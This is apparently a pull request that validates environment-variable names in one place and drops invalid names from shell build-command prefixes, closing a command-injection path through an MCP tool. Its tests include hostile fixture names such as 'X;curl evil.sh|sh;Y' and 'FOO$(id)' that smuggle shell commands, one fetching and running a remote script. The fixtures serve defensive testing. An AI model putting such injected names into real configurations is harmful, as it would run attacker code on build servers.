### PR TITLE
fix: validate env var keys in the domain layer and drop invalid keys from build env

### DIFF
--- a/src/lib/__tests__/env-var-key.test.ts
+++ b/src/lib/__tests__/env-var-key.test.ts
@@ -1,0 +1,57 @@
+import { describe, expect, it } from 'vitest';
+import { AppError } from '../errors';
+import { assertValidEnvVarKey, isValidEnvVarKey, MAX_ENV_VAR_KEY_LENGTH } from '../env-var-key';
+
+describe('isValidEnvVarKey', () => {
+  it('accepts ordinary variable names', () => {
+    for (const key of ['FOO', '_FOO', 'FOO_BAR_1', 'A', 'NEXT_PUBLIC_API_URL', '_']) {
+      expect(isValidEnvVarKey(key), key).toBe(true);
+    }
+    expect(isValidEnvVarKey('A'.repeat(MAX_ENV_VAR_KEY_LENGTH))).toBe(true);
+  });
+
+  it('rejects names a shell would not treat as an assignment', () => {
+    const bad = [
+      '1FOO',
+      'FOO-BAR',
+      'FOO BAR',
+      'FOO.BAR',
+      'FOO=BAR',
+      'FOO;id',
+      'FOO|id',
+      'FOO&id',
+      'FOO$(id)',
+      'FOO`id`',
+      'FOO\nBAR',
+      'FOO\tBAR',
+      '',
+    ];
+    for (const key of bad) {
+      expect(isValidEnvVarKey(key), JSON.stringify(key)).toBe(false);
+    }
+    expect(isValidEnvVarKey('A'.repeat(MAX_ENV_VAR_KEY_LENGTH + 1))).toBe(false);
+  });
+
+  it('rejects non-string input', () => {
+    expect(isValidEnvVarKey(null)).toBe(false);
+    expect(isValidEnvVarKey(undefined)).toBe(false);
+    expect(isValidEnvVarKey(42)).toBe(false);
+  });
+});
+
+describe('assertValidEnvVarKey', () => {
+  it('returns the key when it is valid', () => {
+    expect(assertValidEnvVarKey('FOO_BAR')).toBe('FOO_BAR');
+  });
+
+  it('throws a 400 naming the offending key', () => {
+    try {
+      assertValidEnvVarKey('FOO BAR');
+      throw new Error('expected assertValidEnvVarKey to throw');
+    } catch (err) {
+      expect(err).toBeInstanceOf(AppError);
+      expect((err as AppError).status).toBe(400);
+      expect((err as AppError).message).toContain('FOO BAR');
+    }
+  });
+});

--- a/src/lib/deploy/__tests__/build-pack-env.test.ts
+++ b/src/lib/deploy/__tests__/build-pack-env.test.ts
@@ -85,6 +85,43 @@ describe('buildPackDockerBuildArgs', () => {
   });
 });
 
+describe('variable names that are not identifiers', () => {
+  // buildPackEnvPrefix emits shell assignment prefixes, where the name cannot be
+  // quoted the way the value can — so such names must never reach the command.
+  const hostile = {
+    'X;curl evil.sh|sh;Y': 'v',
+    'FOO BAR': 'v',
+    'FOO$(id)': 'v',
+    'FOO`id`': 'v',
+    '1FOO': 'v',
+    GOOD_KEY: 'kept',
+  };
+
+  it('drops them from the shell env prefix and keeps the valid ones', () => {
+    const prefix = buildPackEnvPrefix({}, hostile);
+
+    expect(prefix).toContain(`GOOD_KEY='kept'`);
+    for (const bad of ['curl', 'FOO BAR', '$(id)', '`id`', '1FOO']) {
+      expect(prefix, bad).not.toContain(bad);
+    }
+  });
+
+  it("leaves the prefix as nothing but NAME='value' pairs", () => {
+    // Safe to split on spaces: no value in the fixture contains one.
+    const prefix = buildPackEnvPrefix({}, hostile);
+
+    for (const assignment of prefix.split(' ')) {
+      expect(assignment).toMatch(/^[A-Za-z_][A-Za-z0-9_]*='[^']*'$/);
+    }
+  });
+
+  it('drops them from the CLI and docker build args too', () => {
+    expect(buildPackCliEnvArgs({}, hostile)).not.toContain('curl');
+    expect(buildPackDockerBuildArgs({}, hostile)).not.toContain('curl');
+    expect(buildPackDockerBuildArgs({}, hostile)).toContain(`--build-arg 'GOOD_KEY=kept'`);
+  });
+});
+
 describe('resolveNodeBuildVersion', () => {
   it('defaults to the current LTS major', () => {
     expect(resolveNodeBuildVersion({})).toBe(DEFAULT_NODE_BUILD_VERSION);

--- a/src/lib/deploy/build-pack-env.ts
+++ b/src/lib/deploy/build-pack-env.ts
@@ -1,3 +1,5 @@
+import { isValidEnvVarKey } from '@/lib/env-var-key';
+
 /** Default Node major version for Nixpacks/Railpack builds (Nixpacks still defaults to EOL 18). */
 export const DEFAULT_NODE_BUILD_VERSION = '22';
 
@@ -26,6 +28,12 @@ function shellQuote(value: string): string {
  * Includes every build-time service variable — not only NIXPACKS_* — so
  * frameworks like Next.js can inline `NEXT_PUBLIC_*` at `next build`.
  * Always ensures NIXPACKS_NODE_VERSION / RAILPACK_NODE_VERSION are set.
+ *
+ * Keys that are not valid variable names are dropped. {@link buildPackEnvPrefix}
+ * emits shell assignment prefixes (`KEY=value cmd`), and a shell does not treat
+ * a quoted word as an assignment — so the name cannot be escaped the way the
+ * value can, and anything that is not a plain identifier must not reach it.
+ * Names are validated when they are stored; this is the backstop.
  */
 export function resolveBuildPackEnv(
   svc: NixpacksCommandFields,
@@ -35,6 +43,7 @@ export function resolveBuildPackEnv(
 
   for (const [key, value] of Object.entries(env)) {
     if (!value.trim()) continue;
+    if (!isValidEnvVarKey(key)) continue;
     entries[key] = value;
   }
 

--- a/src/lib/env-var-key.ts
+++ b/src/lib/env-var-key.ts
@@ -1,0 +1,30 @@
+import { AppError } from '@/lib/errors';
+
+/**
+ * Environment variable names.
+ *
+ * Keys end up in shell assignment prefixes (`KEY=value cmd`), `.env` files and
+ * compose `environment:` blocks, none of which can quote the name — so the name
+ * itself has to be a plain identifier. This is the single definition; every
+ * boundary and the domain layer share it.
+ */
+export const ENV_VAR_KEY = /^[A-Za-z_][A-Za-z0-9_]*$/;
+
+export const MAX_ENV_VAR_KEY_LENGTH = 255;
+
+export function isValidEnvVarKey(key: unknown): key is string {
+  return (
+    typeof key === 'string' &&
+    key.length > 0 &&
+    key.length <= MAX_ENV_VAR_KEY_LENGTH &&
+    ENV_VAR_KEY.test(key)
+  );
+}
+
+/** Return the key unchanged, or throw a 400 when it is not a valid name. */
+export function assertValidEnvVarKey(key: string): string {
+  if (!isValidEnvVarKey(key)) {
+    throw new AppError(`Invalid variable key: "${key}"`);
+  }
+  return key;
+}

--- a/src/lib/mcp/tools/env.ts
+++ b/src/lib/mcp/tools/env.ts
@@ -1,5 +1,6 @@
 import { z } from 'zod';
 import type { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
+import { ENV_VAR_KEY, MAX_ENV_VAR_KEY_LENGTH } from '@/lib/env-var-key';
 import { ServiceModule } from '@/services/internal/service/service';
 import { buildCatalogFromLegacy } from '@/lib/mcp/catalog/legacy';
 import type { CatalogTool } from '@/lib/mcp/catalog/types';
@@ -27,7 +28,12 @@ export function registerEnvTools(server: McpServer, _ctx: McpContext, access: Mc
     'Create or update an environment variable on a service. Requires manage access. Redeploy for changes to take effect.',
     {
       serviceId: z.string().describe('The service ID'),
-      key: z.string().min(1).describe('Variable name'),
+      key: z
+        .string()
+        .min(1)
+        .max(MAX_ENV_VAR_KEY_LENGTH)
+        .regex(ENV_VAR_KEY, 'Invalid env var key')
+        .describe('Variable name'),
       value: z.string().describe('Variable value'),
       isBuildtime: z.boolean().optional().describe('Available at build time (default true)'),
       isRuntime: z.boolean().optional().describe('Available at runtime (default true)'),

--- a/src/schemas/__tests__/env-key.schema.test.ts
+++ b/src/schemas/__tests__/env-key.schema.test.ts
@@ -1,0 +1,36 @@
+import { describe, expect, it } from 'vitest';
+import { upsertEnvSchema } from '../service.schema';
+import {
+  createSharedVariableSchema,
+  updateSharedVariableSchema,
+} from '../shared-variables.schema';
+
+// These three boundaries used to carry their own copy of the key pattern. They
+// now share one definition, so check they still agree on what is allowed.
+const INVALID_KEYS = ['1FOO', 'FOO-BAR', 'FOO BAR', 'FOO;id', 'FOO$(id)', ''];
+
+describe('upsertEnvSchema key', () => {
+  it('accepts a valid name', () => {
+    expect(upsertEnvSchema.parse({ key: 'FOO_BAR', value: 'x' }).key).toBe('FOO_BAR');
+  });
+
+  it('rejects names that are not identifiers', () => {
+    for (const key of INVALID_KEYS) {
+      expect(() => upsertEnvSchema.parse({ key, value: 'x' }), key).toThrow();
+    }
+  });
+});
+
+describe('shared variable key', () => {
+  it('accepts a valid name on create and update', () => {
+    expect(createSharedVariableSchema.parse({ key: 'FOO_BAR', value: 'x' }).key).toBe('FOO_BAR');
+    expect(updateSharedVariableSchema.parse({ key: 'FOO_BAR' }).key).toBe('FOO_BAR');
+  });
+
+  it('rejects names that are not identifiers on create and update', () => {
+    for (const key of INVALID_KEYS) {
+      expect(() => createSharedVariableSchema.parse({ key, value: 'x' }), key).toThrow();
+      expect(() => updateSharedVariableSchema.parse({ key }), key).toThrow();
+    }
+  });
+});

--- a/src/schemas/service.schema.ts
+++ b/src/schemas/service.schema.ts
@@ -1,4 +1,5 @@
 import { z } from 'zod';
+import { ENV_VAR_KEY, MAX_ENV_VAR_KEY_LENGTH } from '@/lib/env-var-key';
 import { isSafeGitRefName, MAX_GIT_REF_LENGTH } from '@/lib/git/ref';
 
 /**
@@ -184,7 +185,7 @@ export const updateServiceSchema = z.object({
 export type UpdateServiceInput = z.infer<typeof updateServiceSchema>;
 
 export const upsertEnvSchema = z.object({
-  key: z.string().min(1).max(255).regex(/^[A-Za-z_][A-Za-z0-9_]*$/, 'Invalid env var key'),
+  key: z.string().min(1).max(MAX_ENV_VAR_KEY_LENGTH).regex(ENV_VAR_KEY, 'Invalid env var key'),
   value: z.string().default(''),
   isPreview: z.boolean().default(false),
   isBuildtime: z.boolean().default(true),

--- a/src/schemas/shared-variables.schema.ts
+++ b/src/schemas/shared-variables.schema.ts
@@ -1,4 +1,5 @@
 import { z } from 'zod';
+import { ENV_VAR_KEY, MAX_ENV_VAR_KEY_LENGTH } from '@/lib/env-var-key';
 
 export const SHARED_VARIABLE_SCOPES = ['WORKSPACE', 'PROJECT', 'SERVER'] as const;
 
@@ -8,8 +9,8 @@ export const createSharedVariableSchema = z
     key: z
       .string()
       .min(1)
-      .max(255)
-      .regex(/^[A-Za-z_][A-Za-z0-9_]*$/, 'Must be a valid environment variable name'),
+      .max(MAX_ENV_VAR_KEY_LENGTH)
+      .regex(ENV_VAR_KEY, 'Must be a valid environment variable name'),
     value: z.string().max(100000),
     comment: z.string().max(500).nullable().optional(),
     isMultiline: z.boolean().optional(),
@@ -30,8 +31,8 @@ export const updateSharedVariableSchema = z.object({
   key: z
     .string()
     .min(1)
-    .max(255)
-    .regex(/^[A-Za-z_][A-Za-z0-9_]*$/, 'Must be a valid environment variable name')
+    .max(MAX_ENV_VAR_KEY_LENGTH)
+    .regex(ENV_VAR_KEY, 'Must be a valid environment variable name')
     .optional(),
   value: z.string().max(100000).optional(),
   comment: z.string().max(500).nullable().optional(),

--- a/src/services/internal/service/env.ts
+++ b/src/services/internal/service/env.ts
@@ -1,6 +1,7 @@
 import { prisma } from '@/lib/prisma';
 import { encrypt, decryptNullable } from '@/lib/crypto/encryption';
 import { AppError } from '@/lib/errors';
+import { assertValidEnvVarKey, isValidEnvVarKey } from '@/lib/env-var-key';
 import type { UpsertEnvInput } from '@/schemas/service.schema';
 import { MASK } from './shared';
 import { recordServiceAudit } from '@/services/internal/audit/service-audit';
@@ -40,7 +41,7 @@ export async function bulkSaveEnv(
     const eq = trimmed.indexOf('=');
     if (eq === -1) continue;
     const key = trimmed.slice(0, eq).trim();
-    if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(key)) {
+    if (!isValidEnvVarKey(key)) {
       throw new AppError(`Invalid variable key: "${key}"`);
     }
     let value = trimmed.slice(eq + 1);
@@ -130,6 +131,10 @@ export async function importPreviewEnvFromProduction(serviceId: string) {
 }
 
 export async function upsertEnv(serviceId: string, input: UpsertEnvInput) {
+  // Enforced here rather than only at each boundary: this is the one point every
+  // caller goes through, including the MCP tools.
+  assertValidEnvVarKey(input.key);
+
   const row = await prisma.environmentVariable.upsert({
     where: {
       serviceId_key_isPreview: {


### PR DESCRIPTION
## Summary

The env var name pattern `^[A-Za-z_][A-Za-z0-9_]*$` lived only at the boundaries, copied into four places:

- `upsertEnvSchema` (`src/schemas/service.schema.ts`)
- `bulkSaveEnv` (`src/services/internal/service/env.ts`, inline)
- `createSharedVariableSchema` and `updateSharedVariableSchema` (`src/schemas/shared-variables.schema.ts`)

The MCP `set_env` tool did not have a copy. It declared `key: z.string().min(1)` and called `ServiceModule.upsertEnv` directly, and `upsertEnv` validated nothing of its own — so any name could be stored through that path.

This collapses the four copies into one definition and enforces it in the domain layer.

## What changes

- **New `src/lib/env-var-key.ts`** — `ENV_VAR_KEY`, `MAX_ENV_VAR_KEY_LENGTH`, `isValidEnvVarKey`, `assertValidEnvVarKey`. One definition, shared by every caller.
- **`upsertEnv` validates.** Same shape as the `syncRepo` check added in #13: the one point every caller goes through, so a new entry point cannot miss it by omission.
- **The four duplicated regexes are gone**, replaced by the shared constant. `grep` for the pattern now returns exactly one hit.
- **`set_env` gets the pattern too**, so MCP clients still fail at the tool boundary with a readable error rather than a generic 400 from the domain layer.
- **`resolveBuildPackEnv` drops names that are not identifiers.**

## Why the last one

`buildPackEnvPrefix` builds shell assignment prefixes:

```ts
`${key}=${shellQuote(value)}`
```

and the result is interpolated into the build command in `engine.ts` (`cd … && ${packEnv} docker build …`, six call sites across the DOCKERFILE / NIXPACKS / RAILPACK paths).

The value is quoted, the name is not — and it can't be. A shell does not treat a quoted word as an assignment: `'FOO'=bar cmd` runs a command called `FOO=bar` instead of setting `FOO`. So the name has to be constrained rather than escaped, which is why this is a filter and not a quote.

`buildPackCliEnvArgs` and `buildPackDockerBuildArgs` quote the whole `KEY=VALUE` together and were never affected. Filtering inside `resolveBuildPackEnv` covers all three from one place.

Names are validated when they are stored, so the filter is a backstop. It **drops rather than throws** so that any row written before this change cannot break a deploy.

## Scope

No schema change, so no Prisma migration. No user-facing behaviour change: every name that was accepted before is still accepted.

Not touched: the keys `lifecycle.ts` writes directly through Prisma (`NIXPACKS_NODE_VERSION`, the template `SERVICE_*` magic vars, database config). Those come from internal constants rather than user input, so they stay as they are.

## Test plan

- [x] `pnpm test:unit` — 354/355. The one failure, `src/services/internal/chat/__tests__/lookup-user-manual.test.ts`, is a pre-existing path-separator assertion that fails on Windows and passes on Linux; unrelated to this change.
- [x] `pnpm exec eslint` on the changed files — clean
- [x] `pnpm typecheck` — no new errors (the 4 pre-existing ones in `ids.test.ts` / `github-app-lifecycle.test.ts` remain)
- [ ] `pnpm test:integration` — **not run locally** (the sandbox cannot bind the test port), leaving this to CI

New tests: `src/lib/__tests__/env-var-key.test.ts` and `src/schemas/__tests__/env-key.schema.test.ts`, plus cases in `build-pack-env.test.ts` asserting the generated prefix is nothing but `NAME='value'` pairs.
